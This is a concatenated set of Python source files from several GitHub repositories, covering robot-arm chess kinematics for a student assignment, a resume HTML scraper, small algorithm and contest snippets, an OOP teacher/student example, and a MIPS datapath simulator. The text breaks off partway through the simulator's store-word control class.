:param chessboard: Chessboard object
:param from_pos: [a1-h8]
:return: Returns a list of instructions for the GUI.
'''
sequence_list = []
# We assume that 20 centimeter above the board is safe.
safe_height = 0.2
# We assume that 10 centimeter above the board is "low".
low_height = 0.1
drop_location = "j5"
# Define half_piece_height according to which piece you are encountering (material)
half_piece_height = (chessboard.pieces_height[material]/2)+chessboard.get_board_height()
# Get the coordinates.
(from_x, from_y, from_z) = board_position_to_cartesian(chessboard, from_pos)
(to_x, to_y, to_z) = board_position_to_cartesian(chessboard, drop_location)
# Hover above the first field on SAFE height:
sequence_list.append(apply_inverse_kinematics(from_x, safe_height, from_z, chessboard.field_size))
# Hover above the first field on LOW height:
sequence_list.append(apply_inverse_kinematics(from_x, low_height, from_z, chessboard.field_size))
# Hover above the first field on half of the piece height:
sequence_list.append(apply_inverse_kinematics(from_x, half_piece_height, from_z, chessboard.field_size))
# Grip the piece
sequence_list.append(apply_inverse_kinematics(from_x, half_piece_height, from_z, 0))
# Give instruction to GUI to pickup piece
sequence_list.append(["GUI", "TAKE", from_pos])
# Hover above the first field on SAFE height (Keep the gripper closed!!):
sequence_list.append(apply_inverse_kinematics(from_x, safe_height, from_z, 0))
# Move to new position on SAFE height
sequence_list.append(apply_inverse_kinematics(to_x, safe_height, to_z, 0))
# Hover above the second field on LOW height:
sequence_list.append(apply_inverse_kinematics(to_x, low_height, to_z, 0))
# Hover above the second field on half of the piece height:
sequence_list.append(apply_inverse_kinematics(to_x, half_piece_height, to_z, chessboard.field_size))
# Give instruction to GUI to drop piece
sequence_list.append(["GUI", "DROP", drop_location])
# Move to new position on SAFE height (And open the gripper)
sequence_list.append(apply_inverse_kinematics(to_x, safe_height, to_z, chessboard.field_size))
return sequence_list | Python | 231 | 39.935066 | 121 | /week2/umi_student_functions.py | 0.650344 | 0.638075 |
ClaartjeBarkhof/ZoekenSturenBewegen | refs/heads/master | #!python2
from __future__ import division, print_function
################################
# ZSB - Opdracht 2 #
# umi_parameters.py #
# 16/06/2017 #
# #
# Anna Stalknecht - 10792872 #
# Claartje Barkhof - 11035129 #
# Group C #
# #
################################
class UMI_parameters:
def __init__(self):
# Specifications of UMI
# Zed
self.hpedestal = 1.082 # di riser/zed in meters
self.pedestal_offset = 0.0675 # ai riser/zed
self.wpedestal = 0.1 # just leave it 0.1
# Dimensions upper arm
self.upper_length = 0.2535 # ai shoulder in meters
self.upper_height = 0.095 # di shoulder in meters
# Dimensions lower arm
self.lower_length = 0.2535 # ai elbow in meters
self.lower_height = 0.080 # di elbow in meters
# Dimensions wrist
self.wrist_height = 0.09 # di wrist in meters
# Height of the arm from the very top of the riser, to the tip of the gripper.
self.total_arm_height = self.pedestal_offset + self.upper_height \
+ self.lower_height + self.wrist_height
# Joint-ranges in meters (where applicable e.g. Riser, Gripper) and in degrees for the rest.
## TODO for students: REPLACE MINIMUM_DEGREES AND MAXIMUM_DEGREES FOR EACH INDIVIDUAL JOINT, THEY ARE NOT THE SAME FOR
# SHOULDER, ELBOW, AND WRIST
self.joint_ranges = {
"Riser" : [0.0, 0.925],
"Shoulder" : [-90.0, 90.0],
"Elbow" : [-180.0, 110.0],
"Wrist" : [-110.0, 110.0],
"Gripper" : [0, 0.05]
}
def correct_height(self, y):
'''
Function that corrects the y value of the umi-rtx, because the real arm runs from
from -self.hpedestal/2 to self.hpedestal/2, while y runs from 0 to self.hpedestal.
'''
return y - 0.5*self.hpedestal
| Python | 56 | 35.125 | 126 | /week2/umi_parameters.py | 0.522986 | 0.475037 |
ClaartjeBarkhof/ZoekenSturenBewegen | refs/heads/master | # ZSB - Opdracht 2 #
# errorreport.py #
# 16/06/2017 #
# #
# Anna Stalknecht - 10792872 #
# Claartje Barkhof - 11035129 #
# Group C #
# #
################################
'''
error report
We started implementing the board_position_to_cartesian function. This function was
tested by printing the cartesian values to see if thehy matched our calculation.
We also printed the board_position and the value of index function to see if it was working
correctly.
Then we implemented the high_path function which we tested by running the program and
pressing compute high path. We then checked the joints_simulation.txt file and saw that
something had changed. We couldn't really test it more because we first had to implement
the inverse_kinematics.
So we made the inverse_kinematics function. And now we had te possibility to test it by
running the program. At first the program wasn't working properly because it took chesspieces
from the table instead of from the chessboard. We found out that it was because we switched x
and z axes.
Then we tried rotating the chessboard and we found out that our board_position_to_cartesian wasn't
working properly. It was only working when we turned the chessboard 0 or 180 degrees. That was because
we walked from h8 in the right angle but it didn't work the way we want. Than we changed
the function so it would calculate the cartesian from the original angle (0 degrees), and than
calculationg that position to the new position at the right angle. Then it worked.
We then had an error rotationg the chessboard -20degrees, the shoulder_angle gave a math error.
That was because the arms are not big enough to reach the top of the board at that angle.
When placed the board closer to the gripper our program worked properly again.
''' | Python | 39 | 47.384617 | 103 | /week2/Errorreport.py | 0.71474 | 0.697243 |
LalithBabu18/python-beautifulsoup | refs/heads/master | import json
import pymongo
from bs4 import BeautifulSoup
client = pymongo.MongoClient("mongodb+srv://localhost")
db = client.test
col = db["resumes"]
documents = col.find({},no_cursor_timeout=True) # if limit not necessary then discard limit
print(type(documents))
new_col = db["resultResumes"]
for i in documents:
dict = {}
doc = i["Resume-Html"]
soup = BeautifulSoup(''.join(doc),features="html.parser")
dict['_id'] = i['_id']
dict['createdTime'] = i['createdTime']
dict['Title'] = i['Title']
location = soup.find('p', attrs={'class' : 'locality'})
if location is not None:
loc = location.get_text()
locspace = " ".join(loc.split())
dict['Location'] = locspace
else:
dict['Location'] = ""
education = soup.find('div',attrs={'class':'section-item education-content'})
if education is not None:
edu= education.get_text()
eduspace = " ".join(edu.split())
edurem = eduspace.replace('Education', '')
dict['Education'] = edurem
else:
dict['Education'] = ""
workexperience = soup.find('div', attrs={'class':'section-item workExperience-content'})
if workexperience is not None:
# print(workexperience.get_text())
bza = []
abcd = soup.findAll('div', attrs={'class': 'work-experience-section'})
k = 0
for j in range(len(abcd)):
print('---------------------------------------------------')
print(j)
worka = abcd[j].find('p', attrs={'class': 'work_title'})
if worka is not None:
workaa = worka.get_text()
workspa = " ".join(workaa.split())
workb = abcd[j].find('div', attrs={'class': 'work_company'})
if workb is not None:
workba = workb.get_text()
workspb = " ".join(workba.split())
workc = abcd[j].find('p', attrs={'class': 'work_dates'})
if workc is not None:
workca = workc.get_text()
workspc = " ".join(workca.split())
workd = abcd[j].find('p', attrs={'class': 'work_description'})
if workd is not None:
workda = workd.get_text()
workspd = " ".join(workda.split())
vskp = workspa + workspb + workspc + workspd
# vskp.append(wora)
# vskp.append(worb)
# vskp.append(worc)
# vskp.append(word)
bza.append(vskp)
print('---------------------------------------------------')
print(bza)
dict['WorkExperience'] = bza
else:
dict['WorkExperience'] = ""
currentcompany = soup.find('div', attrs={'class':'work_company'})
if currentcompany is not None:
company= currentcompany.get_text()
companyspace = " ".join(company.split())
dict['CurrentCompany'] = companyspace
else:
dict['CurrentCompany'] = ""
skills = soup.find('div', attrs={'class':'data_display'})
if skills is not None:
skill= skills.get_text()
skillspace = " ".join(skill.split())
skillarr = []
skillarr.append(skillspace)
dict['Skills'] = skillarr
else:
dict['Skills'] = ""
introduction = soup.find('p', attrs={'class' : 'summary'})
if introduction is not None:
introduction = introduction.get_text()
introductionspace = " ".join(introduction.split())
dict['Introduction'] = introductionspace
else:
dict['Introduction'] = ""
new_col.insert_one(dict)
| Python | 100 | 34.900002 | 92 | /test.py | 0.537883 | 0.537326 |
KartikTalwar/playground | refs/heads/master | import subprocess
def shell(command, stdout=True):
if stdout:
return subprocess.check_output(command, shell=True)
return subprocess.check_call(command, shell=True)
print shell('ls')
| Python | 8 | 23 | 55 | /python/shell.py | 0.755208 | 0.755208 |
KartikTalwar/playground | refs/heads/master | def stringPermutations(string):
rez = []
if len(string) < 2:
rez.append(string)
else:
for position in range(len(string)):
perms = string[:position] + string[position+1:]
for i in stringPermutations(perms):
rez.append(string[position:position+1] + i)
return rez
print stringPermutations('abc') # ['abc', 'acb', 'bac', 'bca', 'cab', 'cba']
| Python | 14 | 28.5 | 76 | /random/StringPermutations.py | 0.57385 | 0.566586 |
KartikTalwar/playground | refs/heads/master | def mapper(function, *params):
rez = []
for args in zip(*params):
rez.append(function(*args))
return rez
print mapper(abs, [-3, 5, -1, 42, 23])
print mapper(pow, [1, 2, 3], [2, 3, 4, 5]) | Python | 8 | 23.125 | 42 | /python/ArbitraryMapper.py | 0.604167 | 0.53125 |
KartikTalwar/playground | refs/heads/master | def powerset(array):
ps = [[]]
for i in array:
ps += [x + [array[i]] for x in ps]
return ps
print powerset([0, 1, 2, 3])
| Python | 7 | 19.285715 | 42 | /computation/powerset.py | 0.5 | 0.471831 |
KartikTalwar/playground | refs/heads/master | import functools
def my_check(func):
@functools.wraps(func)
def decorated_view(*args, **kwargs):
if 1 != 2:
return 'failure'
return func(*args, **kwargs)
return decorated_view
if __namae__ == '__main__':
@my_check
def hello():
return 'success'
| Python | 18 | 14.444445 | 38 | /python/decorator.py | 0.604317 | 0.597122 |
KartikTalwar/playground | refs/heads/master | def stringCombinations(string, right = ''):
if not string:
print right
return
stringCombinations(string[1:], string[0] + right)
stringCombinations(string[1:], right)
stringCombinations('abcd')
| Python | 9 | 21.444445 | 50 | /random/StringCombinations.py | 0.732673 | 0.717822 |
KartikTalwar/playground | refs/heads/master | def qsort(list):
return [] if list==[] else qsort([x for x in list[1:] if x < list[0]]) + [list[0]] + qsort([x for x in list[1:] if x >= list[0]])
| Python | 2 | 74.5 | 133 | /random/QuickSort.py | 0.549669 | 0.516556 |
KartikTalwar/playground | refs/heads/master | newlist = sorted(arr, key=lambda k: k['keyName'])
import operator
newlist = sorted(arr, key=operator.itemgetter('keyName'))
| Python | 4 | 30.25 | 57 | /python/Sort Dictionary by Value.py | 0.736 | 0.736 |
KartikTalwar/playground | refs/heads/master | array = ['duck', 'duck', 'goose']
print max(set(array), key=array.count)
| Python | 2 | 35.5 | 38 | /python/Find Most Common Item From List.py | 0.643836 | 0.643836 |
KartikTalwar/playground | refs/heads/master | def multiply(x, y):
if x.bit_length() <= 1536 or y.bit_length() <= 1536:
return x * y;
else:
n = max(x.bit_length(), y.bit_length())
half = (n + 32) / 64 * 32
mask = (1 << half) - 1
xlow = x & mask
ylow = y & mask
xhigh = x >> half
yhigh = y >> half
a = multiply(xhigh, yhigh)
b = multiply(xlow + xhigh, ylow + yhigh)
c = multiply(xlow, ylow)
d = b - a - c
return (((a << half) + d) << half) + c | Python | 18 | 27.777779 | 56 | /random/KaratsubaMultiplication.py | 0.433269 | 0.402321 |
KartikTalwar/playground | refs/heads/master | class DictObject(dict):
def __getattr__(self, k):
return self[k]
def __setattr__(self, k, v):
return self[k]
obj = DictObject({'key' : 'value'})
print obj.key
| Python | 11 | 15.272727 | 35 | /python/DictionaryToObject.py | 0.581006 | 0.581006 |
KartikTalwar/playground | refs/heads/master | '''
Facebook Hacker Cup 2012 Qualification Round
Alphabet Soup
Alfredo Spaghetti really likes soup, especially when it contains alphabet pasta. Every day he constructs
a sentence from letters, places the letters into a bowl of broth and enjoys delicious alphabet soup.
Today, after constructing the sentence, Alfredo remembered that the Facebook Hacker Cup starts today!
Thus, he decided to construct the phrase "HACKERCUP". As he already added the letters to the broth,
he is stuck with the letters he originally selected. Help Alfredo determine how many times he can place
the word "HACKERCUP" side-by-side using the letters in his soup.
Input
The first line of the input file contains a single integer T: the number of test cases. T lines follow,
each representing a single test case with a sequence of upper-case letters and spaces: the original
sentence Alfredo constructed.
Output
Output T lines, one for each test case. For each case, output "Case #t: n", where t is the test case
number (starting from 1) and n is the number of times the word "HACKERCUP" can be placed side-by-side
using the letters from the sentence.
Constraints
1 < T <= 20
Sentences contain only the upper-case letters A-Z and the space character
Each sentence contains at least one letter, and contains at most 1000 characters, including spaces
'''
import urllib
def parse(string):
d = {'H' : 0, 'A' : 0, 'C' : 0, 'K' : 0, 'E' : 0, 'R' : 0, 'U' : 0, 'P' : 0}
d.update({s: string.count(s) for s in string if s in d})
d['C'] /= 2
return min(d.values())
file = urllib.urlopen("https://raw.github.com/gist/1651354/67521ff0ac3332ca68713dfcd474a431c2d6c427/AlphabetSoupInput.txt").read().split('\n')
open('output.txt', 'w').write( "\n".join( [("Case #%d: %d" % (i, parse(file[i]))) for i in range(1, len(file))]))
| Python | 37 | 47.62162 | 142 | /random/contests/Facebook HackerCup/FBHackerCupAlphabetSoup.py | 0.737632 | 0.70706 |
KartikTalwar/playground | refs/heads/master | """
# Speaking in Tongues
## Problem
We have come up with the best possible language here at Google, called Googlerese. To translate text into
Googlerese, we take any message and replace each English letter with another English letter. This mapping
is one-to-one and onto, which means that the same input letter always gets replaced with the same output
letter, and different input letters always get replaced with different output letters. A letter may be
replaced by itself. Spaces are left as-is.
For example (and here is a hint!), our awesome translation algorithm includes the following three mappings:
'a' -> 'y', 'o' -> 'e', and 'z' -> 'q'. This means that "a zoo" will become "y qee".
Googlerese is based on the best possible replacement mapping, and we will never change it. It will always be
the same. In every test case. We will not tell you the rest of our mapping because that would make the problem
too easy, but there are a few examples below that may help.
Given some text in Googlerese, can you translate it to back to normal text?
Solving this problem
Usually, Google Code Jam problems have 1 Small input and 1 Large input. This problem has only 1 Small input.
Once you have solved the Small input, you have finished solving this problem.
### Input
The first line of the input gives the number of test cases, T. T test cases follow, one per line.
Each line consists of a string G in Googlerese, made up of one or more words containing the letters 'a' - 'z'.
There will be exactly one space (' ') character between consecutive words and no spaces at the beginning or at
the end of any line.
### Output
For each test case, output one line containing "Case #X: S" where X is the case number and S is the string that
becomes G in Googlerese.
### Limits
1 <= T <= 30.
G contains at most 100 characters.
None of the text is guaranteed to be valid English.
### Sample
Input
3
ejp mysljylc kd kxveddknmc re jsicpdrysi
rbcpc ypc rtcsra dkh wyfrepkym veddknkmkrkcd
de kr kd eoya kw aej tysr re ujdr lkgc jv
Output
Case #1: our language is impossible to understand
Case #2: there are twenty six factorial possibilities
Case #3: so it is okay if you want to just give up
"""
import string, urllib
input = 'https://raw.github.com/gist/2404633/65abea31f1a9504903f343e762d007d95ef0540a/GoogleCodeJam-SpeakingInTongues.txt'
decoded = string.maketrans('ynficwlbkuomxsevzpdrjgthaq', 'abcdefghijklmnopqrstuvwxyz')
getdata = urllib.urlopen(input).read().split('\n')[1:]
for i, j in enumerate(getdata):
print "Case #%d: %s" % (i+1, j.translate(decoded))
| Python | 67 | 38.104477 | 124 | /random/contests/Google CodeJam/Speaking in Tongues.py | 0.746662 | 0.727966 |
KartikTalwar/playground | refs/heads/master | def genPrimes(n):
n, correction = n - n%6 + 6, 2 - (n % 6 > 1)
sieve = [True] * (n/3)
for i in xrange(1, int(n**0.5) / 3 + 1):
if sieve[i]:
k = 3*i+1|1
sieve[k*k/3 ::2*k] = [False] * ((n/6 - k*k/6-1) / k+1)
sieve[k*(k-2*(i&1) + 4)/3 :: 2*k] = [False] * ((n/6 - k*(k-2*(i&1)+4)/6-1) / k+1)
return [2,3] + [3*i+1|1 for i in xrange(1,n/3-correction) if sieve[i]]
print genPrimes(10000) | Python | 12 | 36.083332 | 93 | /random/generatePrimes.py | 0.439189 | 0.34009 |
KartikTalwar/playground | refs/heads/master | def fibonacci(n):
if n == 0:
return (0, 1)
else:
a, b = fibonacci(n/2)
c = a*(2*b - a)
d = b*b + a*a
return (c, d) if n%2 == 0 else (d, c+d)
print fibonacci(100000)[0] | Python | 10 | 21.5 | 47 | /computation/FastFibonnaci.py | 0.415179 | 0.352679 |
KartikTalwar/playground | refs/heads/master | print [x % 3/2 * 'Fizz' + x % 5/4 * 'Buzz' or x + 1 for x in range(100)]
| Python | 1 | 72 | 72 | /random/FizzBuzz.py | 0.506849 | 0.39726 |
KartikTalwar/playground | refs/heads/master | # Run this script and enter 3 numbers separated by space
# example input '5 5 5'
a,b,c=map(int,raw_input().split())
for i in range(b+c+1):print(' '*(c-i)+((' /|'[(i>c)+(i>0)]+'_'*4)*(a+1))[:-4]+('|'*(b+c-i))[:b]+'/')[:5*a+c+1]
| Python | 4 | 55.75 | 110 | /random/printCubes.py | 0.524229 | 0.475771 |
KartikTalwar/playground | refs/heads/master | def lengthOfNumber(n):
from math import log10, floor
return int(floor(log10(n)+1))
print lengthOfNumber(12321) # should give 2
| Python | 5 | 26.4 | 44 | /random/LengthOfNumber.py | 0.715328 | 0.635036 |
KartikTalwar/playground | refs/heads/master | def eratosthenes_sieve(n):
candidates = list(range(n+1))
fin = int(n**0.5)
for i in xrange(2, fin+1):
if candidates[i]:
candidates[2*i::i] = [None] * (n//i - 1)
return [i for i in candidates[2:] if i] | Python | 9 | 25.777779 | 52 | /random/EratosthenesSieve.py | 0.533333 | 0.5 |
KartikTalwar/playground | refs/heads/master | def isPrime(n):
import re
return re.match(r'^1?$|^(11+?)\1+$', '1' * n) == None
| Python | 3 | 28.333334 | 57 | /random/IsPrime.py | 0.488636 | 0.431818 |
KartikTalwar/playground | refs/heads/master | """
Beautiful Strings
When John was a little kid he didn't have much to do. There was no internet, no Facebook,
and no programs to hack on. So he did the only thing he could... he evaluated the beauty
of strings in a quest to discover the most beautiful string in the world.
Given a string s, little Johnny defined the beauty of the string as the sum of the beauty
of the letters in it.
The beauty of each letter is an integer between 1 and 26, inclusive, and no two letters
have the same beauty. Johnny doesn't care about whether letters are uppercase or lowercase,
so that doesn't affect the beauty of a letter.
(Uppercase 'F' is exactly as beautiful as lowercase 'f', for example.)
You're a student writing a report on the youth of this famous hacker. You found the string
that Johnny considered most beautiful. What is the maximum possible beauty of this string?
Input
The input file consists of a single integer m followed by m lines.
Output
Your output should consist of, for each test case, a line containing the string "Case #x: y"
where x is the case number (with 1 being the first case in the input file, 2 being the second, etc.)
and y is the maximum beauty for that test case.
Constraints
5 <= m <= 50
2 <= length of s <= 500
Example input Example output
5
ABbCcc Case #1: 152
Good luck in the Facebook Hacker Cup this year! Case #2: 754
Ignore punctuation, please :) Case #3: 491
Sometimes test cases are hard to make up. Case #4: 729
So I just go consult Professor Dalves Case #5: 646
"""
import re, operator, urllib2
def getScore(s):
s = re.sub('[^A-Za-z]', '', s).lower()
total, x, d = 0, 26, {}
d.update({j: s.count(j) for j in s})
data = sorted(d.iteritems(), key=operator.itemgetter(1))[::-1]
for i in data:
total += i[1] * x
x -= 1
return total
file = urllib2.urlopen('https://gist.github.com/raw/4647356/f490a1df2ccda25553c70086205e38fc7e53647e/FBHackerCupBeautifulStrings.txt').read().split('\n')
open('output.txt', 'w').write( "\n".join( [("Case #%d: %d" % (i, getScore(file[i]))) for i in range(1, len(file))][:-1]))
| Python | 61 | 36.590164 | 153 | /random/contests/Facebook HackerCup/BeautifulStrings.py | 0.651264 | 0.617698 |
takeiteasyguy/classes-and-oop | refs/heads/master | NO_STUDENTS = "There is no students for this teacher"
class Person(object):
def __init__(self, name):
self.name = name
def __str__(self):
return "My name is %s" % self.name
class Student(Person):
def __init__(self, name, group):
super(Student, self).__init__(name)
self.group = group
def __str__(self):
return "My name is %s and I'm from %s group" % (self.name, self.group)
def print_group(self):
return "My group is %s" % self.group
class Teacher(Person):
def __init__(self, name):
super(Teacher, self).__init__(name)
self.students = []
def add_student(self, student):
self.students.append(student)
def remove_student(self, student):
for current_student in self.students:
if student.name == current_student.name:
self.students.remove(current_student)
def __str__(self):
return "My name is %s and my students are:\n%s" % (self.name, self.get_all_students())
def get_all_students(self):
if self.students:
return "\n".join("%s" % st for st in self.students)
else:
return NO_STUDENTS
if __name__ == "__main__":
alice_student = Student("Alice", "12")
bob_student = Student("Bob", "12")
alex_teacher = Teacher("Alex")
assert alex_teacher.get_all_students() == NO_STUDENTS
alex_teacher.add_student(alice_student)
assert alex_teacher.get_all_students() == "%s" % alice_student
alex_teacher.add_student(bob_student)
print(alex_teacher)
alex_teacher.remove_student(alice_student)
assert alex_teacher.get_all_students() == "%s" % bob_student
| Python | 57 | 28.526316 | 94 | /main.py | 0.601307 | 0.59893 |
ralphprogrammeert/Datastructure | refs/heads/master | #int
hoeveelKopjesSuiker = 2
#bool
IsDezePersoonMijnMatch = false
IsDezePersoonMijnMatch = true
#string
spreekwoord = "De kat op het spek binden"
| Python | 9 | 15.444445 | 41 | /The Big Three/BigThree.py | 0.785235 | 0.778524 |
ralphprogrammeert/Datastructure | refs/heads/master | #long ** is speciaal karakter betekend eigenlijk 2 tot de 123
MijnBankRekeningNummer = 2**123
#char
char VoorletterNaam = 'r' | Python | 5 | 25 | 61 | /The Expendables/The Expendables.py | 0.751938 | 0.689922 |
ralphprogrammeert/Datastructure | refs/heads/master | #python heeft alleen float
ditIsEenfloat = 0.2422
#decimal
hoeveelKidsHebJe = decimal('1.31') | Python | 5 | 18 | 34 | /Double Trouble/Double Trouble.py | 0.776596 | 0.691489 |
AntLouiz/DatapathWay | refs/heads/master | # Intruçoes que o programa reconhece
FUNCTIONS = {
'101011': 'sw',
'100011': 'lw',
'100000': 'add',
'100010': 'sub',
'100101': 'or',
'100100': 'and'
}
| Python | 9 | 18.444445 | 36 | /li.py | 0.514286 | 0.308571 |
AntLouiz/DatapathWay | refs/heads/master | def to_integer(binary_number):
if not isinstance(binary_number, str):
raise Exception()
return int(binary_number, 2)
def to_binary(number):
if not isinstance(number, int):
raise Exception()
return "{:0b}".format(number)
def extend_to_bits(binary_number, bits = 32):
if not isinstance(binary_number, str):
return None
number_length = len(binary_number)
result = bits - number_length
zero_fill = "0" * result
return "{}{}".format(zero_fill, binary_number)
def to_binaryC2(number, bits = 32):
if not isinstance(number, int):
raise Exception()
if number >= 0 :
number = to_binary(number)
number = extend_to_bits(number, bits)
return number
else:
number = 2**bits + number
number = to_binary(number)
number = extend_to_bits(number, bits)
return number
def to_decimalC2(binary_number):
if not isinstance(binary_number, str):
return None
bits = len(binary_number)
decimal = int(binary_number, 2)
if binary_number[0] == '0':
return decimal
else:
decimal = - (2**bits) + decimal
return decimal | Python | 55 | 20.799999 | 50 | /utils.py | 0.601002 | 0.588481 |
AntLouiz/DatapathWay | refs/heads/master | from utils import (
extend_to_bits,
to_binary,
to_integer,
to_binaryC2,
to_decimalC2
)
class ALU:
def makeSum(self, a, b):
result = to_decimalC2(a) + to_decimalC2(b)
if result > (2**31 -1) or result < -(2**31):
print("{}OVERFLOW OCURRENCE{}".format("-" * 20, "-" * 7))
result = to_binaryC2(result)
return result
def makeSub(self, a, b):
result = to_decimalC2(a) - to_decimalC2(b)
if result > (2**31 -1) or result < -(2**31):
print("{}OVERFLOW OCURRENCE".format("-" * 26))
result = to_binaryC2(result)
return result
def makeAnd(self, a, b):
a = int(a, 2)
b = int(b, 2)
result = to_binary((a & b))
return extend_to_bits(result)
def makeOr(self, a, b):
a = int(a, 2)
b = int(b, 2)
result = to_binary((a | b))
return extend_to_bits(result)
def makeNot(self, a):
a_len = len(a)
a = to_decimalC2(a)
result = to_binaryC2(~a, a_len)
return result
| Python | 58 | 17.827587 | 69 | /logic.py | 0.498168 | 0.467949 |
AntLouiz/DatapathWay | refs/heads/master | from memory import RegistersBank, Memory
from logic import ALU
from instructions import PC
from control import (
ControlSw,
ControlLw,
ControlAdd,
ControlSub,
ControlAnd,
ControlOr,
)
class CPU:
def __init__(self):
self.alu = ALU()
self.pc = PC()
self.registers = RegistersBank()
self.memory = Memory()
self.control_types = {
'add': ControlAdd(self),
'sub': ControlSub(self),
'and': ControlAnd(self),
'or': ControlOr(self),
'lw': ControlLw(self),
'sw': ControlSw(self)
}
def execute(self):
for instruction in self.pc.get_instructions():
instruction_func = instruction.get_func()
self.control_types[instruction_func].execute()
| Python | 33 | 23.666666 | 58 | /core.py | 0.570025 | 0.570025 |
AntLouiz/DatapathWay | refs/heads/master | import abc
from utils import to_integer, to_decimalC2
class BaseControl(abc.ABC):
def __init__(self, cpu):
self.cpu = cpu
@abc.abstractmethod
def execute(self):
pass
class ControlAdd(BaseControl):
def execute(self):
instruction = self.cpu.pc.next_instruction
registers = instruction.get_registers()
print(instruction)
rd = registers['rd']
rs = registers['rs']
print("Read the register 1: {}{}[{}]".format(rs, ' '*25, to_integer(rs)))
rt = registers['rt']
print("Read the register 2: {}{}[{}]".format(rt, ' '*25, to_integer(rt)))
register_data1 = self.cpu.registers.get_value(rs)
print("Read data 1: {}".format(register_data1, ))
register_data2 = self.cpu.registers.get_value(rt)
print("Read data 2: {}".format(register_data2, ))
print("ALU-in-1: {}{}[{}]".format(register_data1, ' '*6, to_decimalC2(register_data1)))
print("ALU-in-2: {}{}[{}]".format(register_data2, ' '*6, to_decimalC2(register_data2)))
alu_result = self.cpu.alu.makeSum(register_data1, register_data2)
print("ALU-result: {}{}[{}]".format(alu_result, ' '*6, to_decimalC2(alu_result)))
self.cpu.registers.set_value(rd, alu_result)
print("Write data: {}".format(alu_result, ))
print("Write register: {}{}[{}]".format(rd, ' '*30, to_integer(rd)))
print("{}".format("-" * 64))
print("\n\n")
class ControlSub(BaseControl):
def execute(self):
instruction = self.cpu.pc.next_instruction
registers = instruction.get_registers()
print(instruction)
rd = registers['rd']
rs = registers['rs']
print("Read the register 1: {}{}[{}]".format(rs, ' '*25, to_integer(rs)))
rt = registers['rt']
print("Read the register 2: {}{}[{}]".format(rt, ' '*25, to_integer(rt)))
register_data1 = self.cpu.registers.get_value(rs)
print("Read data 1: {}".format(register_data1))
register_data2 = self.cpu.registers.get_value(rt)
print("Read data 2: {}".format(register_data2))
print("ALU-in-1: {}{}[{}]".format(register_data1, ' '*6, to_decimalC2(register_data1)))
print("ALU-in-2: {}{}[{}]".format(register_data2, ' '*6, to_decimalC2(register_data2)))
alu_result = self.cpu.alu.makeSub(register_data1, register_data2)
print("ALU-result: {}{}[{}]".format(alu_result, ' '*6, to_decimalC2(alu_result)))
self.cpu.registers.set_value(rd, alu_result)
print("Write data: {}".format(alu_result))
print("Write register: {}{}[{}]".format(rd, ' '*30, to_integer(rd)))
print("{}".format("-" * 64))
print("\n\n")
class ControlAnd(BaseControl):
def execute(self):
instruction = self.cpu.pc.next_instruction
registers = instruction.get_registers()
print(instruction)
rd = registers['rd']
rs = registers['rs']
print("Read the register 1: {}{}[{}]".format(rs, ' '*25, to_integer(rs)))
rt = registers['rt']
print("Read the register 2: {}{}[{}]".format(rt, ' '*25, to_integer(rt)))
register_data1 = self.cpu.registers.get_value(rs)
print("Read data 1: {}".format(register_data1))
register_data2 = self.cpu.registers.get_value(rt)
print("Read data 2: {}".format(register_data2))
print("ALU-in-1: {}{}[{}]".format(register_data1, ' '*6, to_decimalC2(register_data1)))
print("ALU-in-2: {}{}[{}]".format(register_data2, ' '*6, to_decimalC2(register_data2)))
alu_result = self.cpu.alu.makeAnd(register_data1, register_data2)
print("ALU-result: {}{}[{}]".format(alu_result, ' '*6, to_decimalC2(alu_result)))
self.cpu.registers.set_value(rd, alu_result)
print("Write data: {}".format(alu_result))
print("Write register: {}{}[{}]".format(rd, ' '*30, to_integer(rd)))
print("{}".format("-" * 64))
print("\n\n")
class ControlOr(BaseControl):
def execute(self):
instruction = self.cpu.pc.next_instruction
registers = instruction.get_registers()
print(instruction)
rd = registers['rd']
rs = registers['rs']
print("Read the register 1: {}{}[{}]".format(rs, ' '*25, to_integer(rs)))
rt = registers['rt']
print("Read the register 2: {}{}[{}]".format(rt, ' '*25, to_integer(rt)))
register_data1 = self.cpu.registers.get_value(rs)
print("Read data 1: {}".format(register_data1))
register_data2 = self.cpu.registers.get_value(rt)
print("Read data 2: {}".format(register_data2))
print("ALU-in-1: {}{}[{}]".format(register_data1, ' '*6, to_decimalC2(register_data1)))
print("ALU-in-2: {}{}[{}]".format(register_data2, ' '*6, to_decimalC2(register_data2)))
alu_result = self.cpu.alu.makeOr(register_data1, register_data2)
print("ALU-result: {}{}[{}]".format(alu_result, ' '*6, to_decimalC2(alu_result)))
self.cpu.registers.set_value(rd, alu_result)
print("Write data: {}".format(alu_result))
print("Write register: {}{}[{}]".format(rd, ' '*30, to_integer(rd)))
print("{}".format("-" * 64))
print("\n\n")
class ControlLw(BaseControl):
def execute(self):
instruction = self.cpu.pc.next_instruction
registers = instruction.get_registers()
offset = instruction.get_offset()
print(instruction)
rt = registers['rt']
rs = registers['rs']
print("Read the register 1:{}{}{}[{}]".format(' '*20, rs, ' '*6, to_integer(rs)))
register_data = self.cpu.registers.get_value(rs)
print("Read data 1: {}".format(register_data))
print("ALU-in-1: {}{}[{}]".format(register_data, ' '*6, to_decimalC2(register_data)))
print("ALU-in-2: {}{}[{}]".format(offset, ' '*6, to_decimalC2(offset)))
alu_result = self.cpu.alu.makeSum(register_data, offset)
print("ALU-result: {}{}[{}]".format(alu_result, ' '*6, to_decimalC2(alu_result)))
print("Address: {}".format(alu_result))
memory_data = self.cpu.memory.get_value(alu_result)
print("Read data: {}".format(memory_data))
self.cpu.registers.set_value(rt, memory_data)
print("Write data: {}{}[{}]".format(memory_data, ' '*6, to_decimalC2(memory_data)))
print("Write register:{}{}{}[{}]".format(' '*25, rt, ' '*6, to_integer(rt)))
print("{}".format("-" * 64))
print("\n\n")
class ControlSw(BaseControl):
def execute(self):
instruction = self.cpu.pc.next_instruction
registers = instruction.get_registers()
offset = instruction.get_offset()
print(instruction)
rs = registers['rs']
print("Read the register 1:{}{}{}[{}]".format(' '*20, rs, ' '*6, to_integer(rs)))
rt = registers['rt']
print("Read the register 2:{}{}{}[{}]".format(' '*20, rt, ' '*6, to_integer(rt)))
register_data1 = self.cpu.registers.get_value(rs)
print("Read data 1: {}".format(register_data1))
register_data2 = self.cpu.registers.get_value(rt)
print("Read data 2: {}".format(register_data2))
print("ALU-in-1: {}{}[{}]".format(register_data1, ' '*6, to_decimalC2(register_data1)))
print("ALU-in-2: {}{}[{}]".format(offset, ' '*6, to_decimalC2(offset)))
alu_result = self.cpu.alu.makeSum(register_data1, offset)
print("ALU-result: {}{}[{}]".format(alu_result, ' '*6, to_decimalC2(alu_result)))
print("Address: {}".format(alu_result))
